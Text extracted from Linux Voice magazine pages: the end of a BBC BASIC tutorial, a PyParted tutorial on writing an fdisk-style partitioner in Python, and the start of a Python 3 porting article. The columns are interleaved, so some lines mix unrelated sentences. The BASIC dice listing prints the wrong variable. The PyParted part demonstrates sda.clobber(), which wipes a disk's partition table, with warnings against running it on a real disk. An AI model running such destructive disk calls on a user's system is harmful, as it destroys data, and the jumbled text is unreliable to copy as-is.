need to use a name ending in $; without that the            So to generate our 1–6 random number, we multiply
default variable type is numeric. Here, if you don’t use    by 5, add 1, and round down.
the $, it will try to translate the input into a number        An easy improvement of this program would be to
(and doubtless output something odd).                       enable the user to specify how many sides the dice
   You can also define arrays in BASIC with this line:      have, as well as how many dice to throw. Beyond that,
DIM MyVariable(20)                                          play around with it as you like.
which will create a numeric array of length 20.                BBC BASIC has also been updated and made
Keywords in BBC BASIC must be in capitals; variable         available for various platforms including Z80-based
names can be lower case or upper case as you prefer         computers. The manual and downloads for the Z80
(but are case sensitive). (It was common at the time        and DOS version are available online here
just to stick caps lock on and use that for everything,     (www.bbcbasic.co.uk/bbcbasic/bbcbasic.html).
to avoid errors with keywords.)                             These versions are intended to be as compatible as
  Note that if you would rather run this on bwbasic,        possible with the BBC BASIC that ran on the BBC
you need to change line 30:                                 Micro series computers, so the manuals available
30 PRINT “HELLO “; USERNAME$                                here are your best option if you want to experiment
which is one illustration of the differences between        more with the emulator. From the same site, you can
different versions of BASIC.                                also download Brandy BASIC for Linux, which you will
   Now here’s a dice simulation to type into the BBC        have to compile to run.
BASIC simulator:                                               Despite some disparagement over the years, BASIC
10 PRINT “HELLO, HOW MANY DICE TO THROW?”                   had a significant impact on a generation of coders
20 INPUT DICENUMBER                                         and on a particular approach to more intuitive
30 PRINT “YOU WANT TO THROW “ DICENUMBER “ DICE.”           programming. That built-in BASIC prompt during the
40 FOR I = 1 TO DICENUMBER                                  microcomputer era also meant that a generation of
50 DICERANDOM = RND(6)                                      computer users were accustomed to the idea of
60 PRINT “DIE THROWN “ DICENUMBER                           programming and adapting the computer for your
70 NEXT                                                     own purposes – in itself a hugely positive idea.
80 END                                                      Modern computers are far superior in almost all
   This demonstrates the FOR...NEXT loop. As with           regards to those early microcomputers, and modern
modern code, you specify start and end, and                 programming languages far more powerful and
optionally step up (1 being the default). At line 50, we    flexible than BBC BASIC and its ilk. But the sheer ease
use the keyword RND to generate a random number.            of access does set BASIC apart from the rest. At least,
With BBC BASIC, RND without a parameter generates           I’m pretty sure that’s not just the nostalgia talking…
a random number between 0 and 1 (exclusive of 1);
RND(number) generates a random integer between 1
and number (inclusive of number). Run this with RUN          Juliet Kemp is a programming polyglot, and the author of
                                                             O’Reilly’s Linux System Administration Recipes.
and try throwing some dice.



                                                              www.linuxvoice.com                                                                             93
     TUTORIAL PYPARTED



                                 PYPARTED: PYTHON DOES
           TUTORIAL
                                 DISK PARTITIONING
         VALENTINE               Build a custom, command line disk partitioning tool by joining the
          SINITSYN
                                 user-friendliness of Python and the power of C.


                                 P
                                           artitioning is a traditional way to split disk        install to build and install it. It’s a good idea to install
 WHY DO THIS?                              drives into manageable chunks. Linux comes            PyParted you’ve built yourself inside the virtualenv
 • Take complete control of                with variety of tools to do the job: there are        (see http://docs.python-guide.org/en/latest/dev/
   your system’s hard disk.      fdisk, cfdisk or GNU Parted, to name a few. GNU                 virtualenvs for details), to keep your system
 • Write a custom installer      Parted is powered by a library by the name of                   directories clean. There is also a Makefile, if you wish.
   to make things easier         libparted, which also lends functionality to many               This article’s examples use PyParted 3.10, but the
   for your users.
                                 graphical tools such as famous GParted. Although it’s           concepts will stay the same regardless of the version
 • Amaze your friends and
   family with your mastery      powerful, libparted is written in pure C and thus not           you actually use.
   of the libparted C library.   very easy for the non-expert to tap into. If you’re                Before we start, a standard caution: partitioning
                                 writing your own custom partitioner, to use libparted           may harm the data on your hard drive. Back
                                 you’re going to have to manage memory manually                  everything up before you do anything else!
                                 and do all the other elbow grease you do in C. This is
                                 where PyParted comes in – a set of Python bindings              Basic concepts
                                 to libparted and a class library built on top of them,          The PyParted API has two layers. At the bottom one is
                                 initially developed by Red Hat for use in the Anaconda          the _ped module. Implemented entirely in C, it tries to
                                 installer.                                                      keep as close as possible to the native libparted C API.
                                    So why would you consider writing disk partitioning          On top of that, the ‘parted’ package with high-level
                                 software? There could be several reasons:                       Python classes, functions and exceptions is built. You
                                    You are developing a system-level component like             can use _ped functions directly if you wish; however,
                                    an installer for your own custom Linux distribution          the parted package provides a more Pythonic
                                    You are automating a system administration task              approach, and is the recommended way to use
                                    such as batch creation of virtual machine (VM)               PyParted in your programs unless you have some
                                    images. Tools like ubuntu-vm-builder are great, but          special requirements. We won’t go into any details of
                                    they do have their limitations                               using the _ped module in this article.
                                    You’re just having fun.                                        Before you do anything useful with PyParted, you’ll
                                                                         PyParted hasn’t         need a Device instance. A Device represents a piece of

“A word of caution: partitioning                                     made its way into the
                                                                     Python Package Index
                                                                                                 physical hardware in your system, and provides the
                                                                                                 means to obtain its basic properties like model,
may harm the data on your                                            (PyPI) yet, but you may     geometry (cylinders/heads/sectors – it is mostly fake

hard drive. Back everything up!”                                     be lucky enough to find
                                                                     it in your distribution’s
                                                                                                 for modern disks, but still used sometimes), logical
                                                                                                 and physical sector sizes and so on. The Device class
                                                                     repositories. Fedora        also has methods to read data from the hardware and
                                 (naturally), Ubuntu and Debian provide PyParted                 write it back. To obtain a Device instance, you call one
                                 packages, and you can always build PyParted yourself            of the global functions exported by PyParted (in the
                                 from the sources. You will need the libparted headers           examples below, >>> denotes the interactive Python
                                 (usually found in libparted-dev or similar package),            prompt, and … is an omission for readability reasons
                                 Python development files and GCC. PyParted uses the             or line continuation if placed at the beginning):
                                 distutils package, so simply enter python setup.py              >>> import parted
                                                                                                 >>> # requires root privileges to communicate
                                                                                                 ... with the kernel
                                                                                                 >>> [dev.path for dev in parted.getAllDevices()]
                                                                                                 [u’/dev/sda’, u’/dev/mapper/ubuntu--vg-swap_1’,
                                                                                                 u’/dev/mapper/ubuntu--vg-root’,
                                                                                                 u’/dev/mapper/sda5_crypt’]
                                                                                                 >>> # get Device instance by path
                                                                                                 >>> sda = parted.getDevice(‘/dev/sda’)
PyParted was developed to                                                                        >>> sda.model
facilate Red Hat’s installer,                                                                    u’ATA WDC WD1002FAEX-0’
Anaconda.                                                                                        >>> sda.hardwareGeometry, sda.biosGeometry



94                                                                 www.linuxvoice.com
                                                                                                                           PYPARTED TUTORIAL

((121601, 255, 63),
(121601, 255, 63)) # cylinders, heads, sectors                 Caution: partitioning may void your warranty
>>> sda.sectorSize, sda.physicalSectorSize
                                                               Playing with partitioning is fun but also quite        is writable for the user that you are running
(512L, 512L)                                                   dangerous: wiping the partition table on your          scripts as). The last command removes the
>>> # Destroy partition table; NEVER do this on                machine’s hard drive will almost certainly             device when it is no longer needed.
... your computer’s disk!                                      result in data loss. It is much safer to do               If you feel adventurous, you can also fake
>>> sda.clobber()                                              your experiments in a virtual machine (like            your hard drive with a qcow2 (as used by
                                                               VirtualBox) with two hard drives attached. If          Qemu), VDI, VMDK or other image directly
True
                                                               this is not an option, you can ‘fake’ the hard         supported by virt-manager, Oracle VirtualBox
  Next comes the Disk, which is the lowest-level               drive with an image file ($ is a normal user           or VMware Workstation/Player. These
operating system-specific abstraction in the PyParted          and # is a superuser shell prompt):                    images can be created with qemu-img and
class hierarchy. To get a Disk instance, you’ll need a         $ dd if=/dev/zero of=<image_file_name> \               mounted with qemu-nbd:
Device first:                                                   bs=512 count=<disk_size_in_sectors>                   $ qemu-img create -f vdi disk.vdi 10G
                                                                  This will almost work; however, Partition.          # modprobe nbd
>>> disk = parted.newDisk(sda)
                                                               getDeviceNodeName() will return non-                   # qemu-nbd -c /dev/nbd0 disk.img
Traceback (most recent call last):                             existent nodes for partitions on that device.              You can then mount the partitions on
...                                                            For more accurate emulation, use losetup               disk.img as /dev/nbd0pX (where X is
_ped.DiskException: /dev/sda: unrecognised disk label          and kpartx:                                            partition number), provided the label you use
   This reads the disk label (ie the partitioning scheme)      # losetup -f <image_file_name>                         is supported by your OS kernel (unless you
                                                               # kpartx -a /dev/loopX                                 are creating something very exotic, this will
from /dev/sda and returns the Disk instance that
                                                               ...                                                    be the case). When you are done, run:
represents it. If /dev/sda has no partitions (consider         # losetup -d /dev/loopX                                # qemu-nbd -d /dev/nbd0
the sda.clobber() call before), parted.DiskException is        where X is the losetup device assigned to              to disconnect image from the device. This
raised. In this case, you can create a new disk label of       your image file (get it with losetup -a). After        way, you can create smaller images that are
your choice:                                                   that, you may refer to the partitions on your          directly usable in virtual machines.
                                                               image file via /dev/loopXpY (or /dev/mapper/               Sometimes, it may look like changes you
>>> disk = parted.freshDisk(sda, ‘msdos’) # or ‘gpt’
                                                               loopXpY, depending on your distribution).              make to such virtual drives via external tools
  You can do it even if the disk already has partition         This will require root privileges, so be careful.      (like mkfs) are silently ignored. If this is your
table on it, but again, beware of data-loss. PyParted          You can still run your partitioning scripts            case, flush the disk buffers:
supports many disk labels. However, traditional                on an image file as an ordinary user, given            # blockdev --flushbufs <device_node_name>
‘msdos’ (MBR) and newer ‘gpt’ (GUID Partition Table)           that the file has sufficient permissions (ie
are probably most popular in PC world.
  Disk’s primary purpose is to hold partitions:
# Will be empty after clobber() or freshDisk()              >>> geometry = parted.Geometry(start=0,
>>> disk.partitions                                         ... length=parted.sizeToSectors(128, ‘MiB’,
[<parted.partition.Partition object at 0x1043050>, ...]     ... sda.sectorSize), device=sda)
 Each partition is represented by Partition object          >>> new_partition = parted.Partition(disk=disk,
which provides ‘type’ and ‘number’ properties:              ... type=parted.PARTITION_NORMAL,
>>> existing_partition = disk.partitions[0]                 ... geometry=geometry)
>>> existing_partition.type, existing_partition.number      >>> new_partition.geometry
(0L, 1) # 0 is normal partition                             <parted.geometry.Geometry object at 0xdc9050>
>>> parted.PARTITION_NORMAL                                    Partitions (or geometries, to be more precise) may
0                                                           also have an associated FileSystem object. PyParted
  Besides parted.PARTITION_NORMAL, there are                can’t create new filesystems itself (parted can, but it is
other partition types (most importantly, parted.            still recommended that you use special-purpose
PARTITION_EXTENDED and parted.PARTITION_                    utilities like mke2fs). However, it can probe for existing
LOGICAL). The ‘msdos’ (MBR) disk label supports all         filesystems:
of them, however ‘gpt’ can hold only normal partitions.     >>> parted.probeFileSystem(new_partition.geometry)
                                                                                                                                               PRO TIP
  Partitions can also have flags like parted.               Traceback (most recent call last):
                                                                                                                                           Python virtual
PARTITION_BOOT or parted.PARTITION_LVM. Flags               ...                                                                            environments
are set by the Partition.setFlag() method, and              _ped.FileSystemException: Failed to find any filesystem                        (virtualenvs) are a great
retrieved by Partition.getFlag(). We’ll see some            in given geometry                                                              to play with modules that
                                                                                                                                           you don’t need on your
examples later.                                             >>> parted.probeFileSystem(existing_partition.geometry)                        system permanently.
  The partition’s position and size on the disk are         u’ext2’
defined by the Geometry object. Disk-related values         >>> new_partition.fileSystem
(offsets, sizes, etc) in PyParted are expressed in          <parted.filesystem.FileSystem object at 0x27a1310>
sectors; this holds true for Geometry and other               The names (and corresponding FileSystem objects)
classes we’ll see later. You can use the convenient         for filesystems recognised by PyParted are stored in
function parted.sizeToSectors(value, ‘B’, device.           parted.fileSystemType dictionary:
sectorSize) to convert from bytes (denoted as ‘B’;          >>> parted.fileSystemType.keys()
other units such as ‘MB’ are available as well). You set    [u’hfsx’, u’fat32’, u’linux-swap(v0)’, u’affs5’, u’affs2’, u’ext4’,
the Geometry when you create the partition, and             u’ext3’, u’ext2’, u’amufs’, u’amufs0’, u’amufs1’, u’amufs2’,
access it later via the partition.geometry property:        u’amufs3’, u’amufs4’, u’amufs5’, u’btrfs’, u’linux-swap(v1)’,
>>> # 128 MiB partition at the very beginning of the disk   u’swsusp’, u’hfs+’, u’reiserfs’, u’freebsd-ufs’, u’xfs’, u’affs7’,



                                                              www.linuxvoice.com                                                                                          95
     TUTORIAL PYPARTED

                                                                                                    Let’s start with Alignment, which is defined by two
                                                                                                 values: offset and grain. Any sector number X with X =
                                                                                                 offset + N * grain (with N being non-negative integer)
                                                                                                 complies with Alignment. When you need to tell
                                                                                                 PyParted that your partitions should start (or end) at a
                                                                                                 1MiB (or some other) boundary, Alignment is the way
                                                                                                 to do it. Any value satisfies Alignment(0, 1) which is
                                                                                                 equivalent to no alignment at all.
                                                                                                    Constraint is basically a set of six conditions on
                                                                                                 Geometry (not a Partition!) that are wrapped together
                                                                                                 to control the following:
                                                                                                    How the Geometry’s boundaries are aligned
                                                                                                    (startAlign/endAlign properties).
                                                                                                    Where the Geometry can start or end (startRange/
                                                                                                    endRange).
fdisk displays partition      u’ntfs’, u’zfs’, u’affs4’, u’hfs’, u’affs6’, u’affs1’, u’affs0’,      What the Geometry’s minimum and maximum
table on the author’s
                              u’affs3’, u’hp-ufs’, u’fat16’, u’sun-ufs’, u’asfs’, u’jfs’,           sizes are (minSize/maxSize).
computer.
                              u’apfs2’, u’apfs1’]                                                   You do not always need to specify all of them. The
                                To add a partition to the disk, use                              Constraint constructor provides the shortcuts
                              disk.addPartition():                                               minGeom, maxGeom and exactGeom, which create a
                              >>> disk.addPartition(new_partition)                               Constraint that fully embraces, is fully contained by, or
                              Traceback (most recent call last):                                 exactly coincides with the Geometry you pass as an
                              ...                                                                argument. If you use one of these, any alignment will
                              _ped.PartitionException: Unable to satisfy all constraints         satisfy the Constraint check. As another special case,
                              on the partition.                                                  Constraint(device=dev) accepts any Geometry
                                                                                                 attached to the Device dev.
                                 As you can see, partitions on the disk are subject to              It isn’t easy to catch the meaning of all these
                              some constraints, which we’ve occasionally violated                properties at once. Have a look at the diagram below,
                              here. When you pass a partition to disk.addPartition(),            which depicts all of them in graphical form. Both
                              its geometry may change due to constraints that you                Alignment and Constraint provide the intersect()
                              spefify via the second argument (in the example                    method, which returns the object that satisfies both
                              above, it defaults to None), and constraints imposed               requirements. You can also check that the given
                              by libparted itself (for instance, in the MBR scheme, it           Geometry satisfies the Constraint with the Constraint.
                              won’t let you start a partition at the beginning of a              isSolution(geom) method. The Constraint.solveMax()
                              disk, where the partition table itself resides). This is           method returns the maximum permitted geometry
                                                                where things start to            that satisfies the Constraint, and Constraint.
“Managing constraints is                                        get interesting.                 solveNearest(geom) returns the permitted geometry
                                                                                                 that is nearest to the geom that you’ve specified.
probably the most complex                                                 Know your limits       What’s ‘nearest’ is up to the implementation to decide.
thing PyParted does for you.”                                   Managing constraints
                                                                is probably the most             Partitioning on Ye Olde Windows NT
                                                                complex and most                 Imagine for a moment you need to create system
                              useful part of what PyParted does for you. Partitions              partition for Windows NT4 prior to Service Pack 5
A visual representation       on a hard disk generally can’t start or end where you              (remember that weird creature?). As the hardware
of different kwargs           want. There should be a gap between the beginning of               requirements suggest (http://en.wikipedia.org/wiki/
accepted by the Constraint    a disk and your first partition to store internal                  Windows_NT#Hardware_requirements), it must be
constructor. Red/Yellow       partitioning data; today, many operating systems                   no more than 4GB in size, contained within the first
rectangles are startRange/
                              reserve 1MiB for these purposes. Partitions should be              7.8GB of the hard disk, and begin in the first 4GBs.
endRange, blue/green are
maxGeom/minGeom. Large        aligned to physical sector boundaries, or severe                   Here’s how to do this with PyParted:
ticks denote startAlign       performance degradation may occur. This is not to                  >>> optimal = sda.optimumAlignment
(lower) or endAlign(upper).   say that partitions can’t overlap; PyParted takes care             >>> start = parted.Geometry(device=sda,
Small ticks represent         of all these nuances, and Constraint and Alignment                 ... start=0,
sectors.                      classes play a central role in this process.                       ... end=parted.sizeToSectors(4, ‘GB’,
                                                                                                 ... sda.sectorSize))
                                                                                                 >>> end = parted.Geometry(device=sda,
                                                                                                 ... start=0,
                                                                                                 ... end=parted.sizeToSectors(7.8, ‘GB’,
                                                                                                 ... sda.sectorSize))
                                                                                                 >>> min_size = parted.sizeToSectors(124, ‘MB’,
                                     Hard disk space.                                            ... sda.sectorSize) # See [ref:4]



96                                                                        www.linuxvoice.com
                                                                                                                        PYPARTED TUTORIAL

>>> max_size = parted.sizeToSectors(4, ‘GB’,
... sda.sectorSize)                                            Each disk needs a label
>>> constraint=parted.Constraint(startAlign=optimal,           Many modern operating systems enable you            standards, it’s very limited: it may contain
... endAlign=optimal,                                          to assign a label to a disk, which is especially    at most four partitions (called ‘primary’) and
... startRange=start, endRange=end,                            useful for removable media (/media/                 stores partition offsets as 32-bit integers.
... minSize=min_size, maxSize=max_size)                        BobsUSBStick says more than /media/sdb1).           If you need more, one partition should be
                                                               But they are not the disk labels that libparted     marked as ‘extended’, and it may contain as
>>> disk.addPartition(partition=new_partition,
                                                               refers to.                                          many logical partitions as you want. This is
... constraint=constraint)                                        When we speak of disk labels on these            the reason why logical partitions are always
True                                                           pages, we mean partition tables. It is very         numbered starting with 5 in Linux.
>>> print new_partition.geometry                               uncommon for a hard disk to not to have one             The newer GUID Partition Table (‘gpt’) is
parted.Geometry instance --                                    (although many flash drives comes with no           much more flexible. It’s usually mentioned
                                                               partitions). Linux usually sees unpartitioned       in connection with UEFI, however it is
  start: 2048 end: 262144 length: 260097
                                                               devices as /dev/sdX (with X being a letter);        self-contained and can be used on BIOS
   ...                                                         partitions are suffixed with an integer (say,       systems as well. In a ‘gpt’ disk label,
   If you want to specify startRange or endRange,              /dev/sda1).                                         partitions are identified by Globally Unique
you’ll need to provide both alignments and size                   There are many different partitioning            Identifiers (GUID) values. Their starting and
constraints as well. Now, please go back and look at           schemes (or disk labels). Traditionally, the        ending offsets are 64-bit, so there is some
                                                               ‘msdos’ (MBR) disk partitioning scheme was          safety margin for hard disks of tomorrow’s
the first line. As you probably guessed, device.
                                                               the most popular one for PCs. By today’s            capacities.
optimumAlignment and its counterpart, device.
minimumAlignment, provides optimum (or minimum)
alignment accepted by the hardware device you’re
creating the partition on. Under Linux, in-kernel device     so I suggest you open the program code now in
driver-reported attributes like alignment_offset,            GitHub (https://github.com/vsinitsyn/fdisk.py) to
minimum_io_size and optimal_io_size are generally            follow it as you read the next section.
used to determine the meaning of ‘minimum’ and
‘optimum’. For example, an optimally aligned partition       Your very own fdisk
on a RAID device may start on a stripe boundary, but a       fdisk is probably the most basic partitioning tool. It’s
fixed 1MiB-grained alignment (as in Windows 7/Vista)         an console program: it reads single-letter commands
will usually be preferred for an ordinary hard disk.         entered by a user and acts accordingly, printing
‘Minimum’ is roughly equivalent to ‘by physical sector       results on the screen. Originally, it supported MBR and
size’, which can be 4,096 bytes even if the device           also BSD/SUN disk labels; we’ll stick to MBR only.
advertises traditional 512-bytes sector addressing.             Our example (let’s call it fdisk.py) is a somewhat
   Back to the _ped.PartitionException we saw earlier.       more elaborate version of fdisk/fdisk.py found in the
In order to fix it, you need to specify the proper           PyParted sources https://git.fedorahosted.org/cgit/
constraint:                                                  pyparted.git/tree/src/fdisk/fdisk.py, but it’s a bit
>>> # Most relaxed constraint; anything on the               simplified compared with the real fdisk. Since parted
... device would suffice                                     and fdisk are not 100% compatible (although parted
>>> disk.addPartition(new_partition,                         is more advanced in many ways), there are some
... parted.Constraint(device=sda))                           discrepancies (see comments in the sources for
True                                                         details). However, fdisk.py implements all the basic
>>> print new_partition.geometry                             functions you’d expect from the partitioning software:
parted.Geometry instance --                                  it can create partitions (both primary and logical), list
  start: 32 end: 262143 length: 262112                       them, delete them, and even mark them as bootable.
  ...                                                        All of these options are implemented as methods of
>>> print geometry                                           the Fdisk class, which is instantiated when the
parted.Geometry instance --                                  program starts. In Fdisk.__init__(), we check whether
  start: 0 end: 262143 length: 262144                        the drive already has a partition table and create it if
  ...                                                        necessary. If the disk has any partition table other
Note that the Geometry we’ve specified was adjusted          than MBR, the program exits immediately. The main
due to constraints imposed internally by libparted for       loop simply dispatches commands entered by a user
the MBR partitioning scheme.                                 to Fdisk’s instance methods. If any of them raise an
  When you’re done, commit the changes you’ve                ExitMainLoop exception, the program ends.
made to the hardware. Otherwise they will remain in             Let’s start with the code that displays a partition
memory only, and the real disk won’t be touched:             table. In the real fdisk, it looks like the image at the top
>>> disk.commit()                                            of page 96. And the following is the relevant part of
True                                                         fdisk.py code:
   We’ve seen all the major bits that PyParted is made       print “””
from. Now let’s use all of them together in a bigger         Disk {path}: {size_mbytes:d} MB, {size:d} bytes
program – an fdisk clone, almost full-featured, and          {heads:d} heads, {sectors:d} sectors/track, \
just a little more than 400 lines of Python code in size!    {cylinders:d} cylinders, total {sectors_total:d} sectors
Not all of these lines will be in the magazine, obviously,   Units = 1 * sectors of {unit:d} = {unit:d} bytes



                                                               www.linuxvoice.com                                                                                   97
     TUTORIAL PYPARTED

                                                                                                   previous section). Since we don’t allow our user to
                                                                                                   change units (as the real fdisk does), unit variable is
                                                                                                   always equal to sector size. Everything else is
                                                                                                   straightforward.
                                                                                                      Parted has no concept of DOS disk label types such
                                                                                                   as ‘Linux native’, ‘Linux swap’, or ‘Win95 FAT32’. If you
                                                                                                   were to install good old Slackware using fdisk back in
                                                                                                   1999, you would almost certainly use some of these.
                                   libparted provides the power behind many well-known             So we emulate disk labels to some extent on top of
                                   free software tools, including GParted.                         the partition and filesystem types provided by
                                                                                                   PyParted. This is done in the Fdisk._guess_system()
                                   Sector size (logical/physical): {sector_size:d} \               method. We recognise things like ‘Linux LVM’ and
                                   bytes / {physical_sector_size:d} bytes                          ‘Linux RAID’, parted.PARTITION_SWAP maps to ‘Linux
                                   I/O size (minimum/optimal): {minimum_io_size:d} \               swap’, ext2/3/4, btrfs, ReiserFS, XFS, and JFS are
                                   bytes / {optimal_io_size:d} bytes                               displayed as ‘Linux native’, and we even support
                                   “””.format(**data)                                              FAT16/32 and NTFS. As a bonus, PyParted enables
                                                                                                   you to identify hidden or service partitions added by
                                   width = len(disk.partitions[0].path) \                          some hardware vendors (https://git.fedorahosted.
                                    if disk.partitions else len(‘Device’) + 1                      org/cgit/pyparted.git/tree/src/fdisk/fdisk.py). If the
                                   print “{0:>{width}} Boot Start          \                       heuristic doesn’t work, we print ‘unknown’.
                                    End Blocks Id System”.format(‘Device’, width)
                                      The data dictionary is filled as follows:                    Creating partitions
                                   unit = device.sectorSize                                        It is also easy to delete a partition. The only thing to
                                   size = device.length * device.sectorSize                        remember is that partitions on the disk can be out of
                                   cylinders, heads, sectors = \                                   order, so you can’t use the partition number as an
                                     device.hardwareGeometry                                       index in the disk.partitions array. Instead, we iterate
                                   minGrain, optGrain = \                                          over it to find the partition with the number that a user
                                     device.minimumAlignment.grainSize,                            has specified:
                                     device.optimumAlignment.grainSize                             for p in self.disk.partitions:
                                   data = {                                                         if p.number == number:
                                     ‘path’: device.path,                                             try:
                                     ‘size’: size,                                                     self.disk.deletePartition(p)
                                     ‘size_mbytes’: int(parted.formatBytes(size, ‘MB’)),              except parted.PartitionException as e:
                                     ‘heads’: heads,                                                   print e.message
                                     ‘sectors’: sectors,                                              break
                                     ‘cylinders’: cylinders,                                          If we try to delete an extended partition that
                                     ‘sectors_total’: device.length,                               contains logical partitions, parted.PartitionException
                                     ‘unit’: unit,                                                 will be raised. We catch it and print a friendly error
                                     ‘sector_size’: device.sectorSize,                             message. The last break statement is essential.
                                     ‘physical_sector_size’: device.physicalSectorSize,            PyParted automatically renumbers the partitions
                                     ‘minimum_io_size’: minGrain * device.sectorSize,              when you delete any of them. So, if you have, for
                                     ‘optimal_io_size’: optGrain * device.sectorSize,              instance, partitions 1–4, and delete the one numbered
                                   }                                                               3, the partition that was previously number 4 will
                                      We can deduce the maximum and optimum I/O                    become the new 3, and will be deleted at the next
                                   sizes from corresponding alignment values (see the              iteration of the loop.
                                                                                                      The largest method, not surprisingly, is the one that
                                                                                                   creates partitions. Let’s look at it step by step. First of
 Chinese Remainder Theorem
                                                                                                   all, we check how many primary and extended
 If you were curious enough to skim through         basket, you’ll need to take them out in        partitions are already on the disk, and how many
 the libparted documentation, you’ve                batches of five. Using the Chinese Remainder   primary partitions are available:
 probably spotted a reference to the Chinese        Theorem, you can determine how many eggs
                                                                                                   # Primary partitions count
 Remainder Theorem. Despite the somewhat            are in the basket.
 flippant name, it’s a serious statement that           When you place a partition somewhere       pri_count = len(self.disk.getPrimaryPartitions())
 comes from number theory. Basically, it lets       on a disk, libparted needs to satisfy both     # HDDs may contain only one extended partition
 you to find a minimum integer that yields          alignments (among other things). This is       ext_count = 1 if self.disk.getExtendedPartition() else 0
 given remainders for given divisors. If this       accomplished by solving a system of linear     # First logical partition number
 all sounds like gibberish, think of a basket of    equations (see the natmath.c source code
                                                                                                   lpart_start = self.disk.maxPrimaryPartitionCount + 1
 eggs. You don’t know how many of them are          if you are really curious). It’s amazing to
 in it, however, if you take them out by twos       realise that a 1,500-year old maths problem    # Number of spare partitions slots
 or threes, you’ll have one of them remaining       is useful for a free software library of the   parts_avail = self.disk.maxPrimaryPartitionCount -\
 in the bottom of the basket; to empty the          21st century.                                   (pri_count + ext_count)
                                                                                                   Then we check if the disk has some free space and



98                                                                       www.linuxvoice.com
                                                                                                                     PYPARTED TUTORIAL

return from the method if not. After this, we ask the
user for the partition type. If there are no primary           Resources
partitions available, and no extended partition exists,
                                                                 PyParted homepage https://fedorahosted.org/pyparted
one of primary partitions needs to be deleted, so we             Virtual Environments guide http://docs.python-guide.org/
return from the method again. Otherwise, a user can              en/latest/dev/virtualenvs
create either a primary partition, an extended partition         Partition types: properties of partition tables
(if there isn’t one yet), or a logical partition (if an          www.win.tue.nl/~aeb/partitions/partition_types-2.html
                                                                 Windows NT4 Hardware Requirements
extended partition is already here). If the disk has
                                                                 http://en.wikipedia.org/wiki/Windows_NT#Hardware_
fewer than three primary partitions, a primary partition         requirements
is created by default; otherwise we default to an                fdisk.py sources (this article’s version)
extended or logical one.                                         https://github.com/vsinitsyn/fdisk.py
    We also need to find a place to store the new                PyParted’s fdisk.py sample code
                                                                 https://git.fedorahosted.org/cgit/pyparted.git/tree/src/
partition. For simplicity’s sake, we use the largest free
                                                                 fdisk/fdisk.py
region available. Fdisk._get_largest_free_region() is
responsible for this; it’s quite straightforward except
one simple heuristic. It ignores regions shorter than          After that, Fdisk._create_partition() asks for the
optimum alignment grain (usually 2048 sectors): they         beginning and the end of the partition. Fdisk._parse_
are most likely alignment gaps.                              last_sector_expr() parses expressions like +100M,
    Any logical partition created must fit inside the        which fdisk(1) uses as the last sector specifier. Then,
extended partition, and we use Geometry.intersect()          the partition is created as usual:
to ensure that this is the case. On the contrary, a          try:
primary partition must lie outside the extended, so if        partition = parted.Partition(
the intersection exists, we return from the method.             disk=self.disk,
The code is similar in both cases; below is the former          type=type,
check (which is a bit shorter):                                 geometry=parted.Geometry(
try:                                                             device=self.device,
 geometry = ext_part.geometry.intersect(geometry)                start=part_start,
except ArithmeticError:                                          end=part_end))
 print “No free sectors available”                            self.disk.addPartition(partition=partition,
 return                                                         constraint=constraint)
   If there is no intersection, Geometry.intersect()         except (parted.PartitionException,
raises ArithmeticError.                                       parted.GeometryException,
   All the heavy lifting is done in the Fdisk._create_        parted.CreateException) as e:
partition() method, which accepts the partition type          raise RuntimeError(e.message)
and the region that will hold the new partition. It starts     If part_start or part_end are incorrect, the exception
as follows:                                                  will be raised (see the comments in the source code
alignment = self.device.optimalAlignedConstraint             for the details). It is caught in the Fdisk.add_partition()
constraint = parted.Constraint(maxGeom=geometry).\           method, which displays error messages and returns.
  intersect(alignment)                                         To save the partition table on to the disk, a user
data = {                                                     enters the w command at the fdisk.py prompt. The
  ‘start’: constraint.startAlign.\                           corresponding method (Fdisk.write()) simply calls
    alignUp(region, region.start),                           disk.commit() and raises MainLoopExit to exit.
  ‘end’: constraint.endAlign.\
    alignDown(region, region.end),                           Afore ye go
}                                                            Python is arguably the scripting language of choice in
  As in the real fdisk(1), we align partitions optimally     today’s Linux landscape, and is widely used for
by default. The partition created must be no larger          various tasks including the creation of system-level
than the available free space (the region argument),         components. As an interpreted language, Python is
so the maxGeom constraint is enforced. Intersecting          just as powerful as its bindings, which enable scripts
these gives us a Constraint that aligns partitions           to make use of native C libraries. In this perspective,
optimally within boundaries specified. data[‘start’] and     it’s nice to have tools like PyParted in our arsenal.
data[‘end’] are used as guidelines when prompting for        Implementing partitioners is hardly an everyday task
the partition’s boundaries, and they shouldn’t be            for most of us, but if you ever face it, the combination
misleading. Thus we perform the same calculation             of an easy-to-use language and a production-grade
that libparted does internally: find start or end values     library can greatly reduce your programming efforts
that are in a specified range and aligned properly. Try      and development time.
to play with these; for example, change the alignment
to self.device.minimalAlignedConstraint and see               Dr Valentine Sinitsyn edited the Russian edition of O’Reilly’s
what changes when you create a partition on an                Understanding the Linux Kernel, has a PhD in physics, and is
                                                              currently doing clever things with Python.
empty disk.



                                                               www.linuxvoice.com                                                        99
      CODING PYTHON 3



                            PYTHON: MIGRATE YOUR
          TUTORIAL
                            PROGRAMS TO VERSION 3
                            It’s been long enough: it’s time to port your applications to
RICHY DELANEY
                            Python 3 and take advantage of its great new features.


                            P
                                    ython, like most other pieces of software, sees      be written in Python 3? For many years following
 WHY DO THIS?                       incremental releases fairly frequently. If you       the release of Python 3, the lack of quality external
 • Embrace the future!              have used Python on any Linux distribution in        libraries meant that it was often not a good choice.
 • Take advantage of the    the past decade, it’s likely that you were using Python      Nowadays, this has changed significantly, and the
   latest improvements to
   Python.                  2 of some variety (Python 2.0 was released in October        number of libraries that support Python 3 is growing
 • Get users around the     2000, and the last Python release of the 2.x versions        every day. Major Python projects such as the Django
   world with Unicode       was 2.7).                                                    web framework now support Python 3 on its stable
   characters.                All of the previous releases of Python have been           branch.
                            backwards compatible, which means that although                 Coupled with this, Python 2.X is now an old
                            the underlying code has changed with each release,           language that, although maintained and supported, is
                            the core structure of Python remained the same. The          no longer developed. Guido recently extended the life
                            syntax as well as the majority of the standard library       of Python 2.7 to 2020, but Python 2.7 is a language
                            APIs were unchanged. This meant that code that runs          which is guaranteed to not have any new features in
                            on Python 2.5 for example should run on Python 2.7.          its lifespan. With Python 3, you get all the latest and
                              Python 3 was the first release of Python that was          greatest features in the standard library.
                            backwards incompatible. This led to a slow uptake,
                            and many developers were reluctant to put in the             Fantastic features
                            extra effort to update their software. There is still a      If you read about Python 3 online, you may be forced
                            massive subset of the Python community who use               into thinking the only difference is that the print
                            Python 2.X rather than the new version.                      statement is now a function, but Python 3 also adds
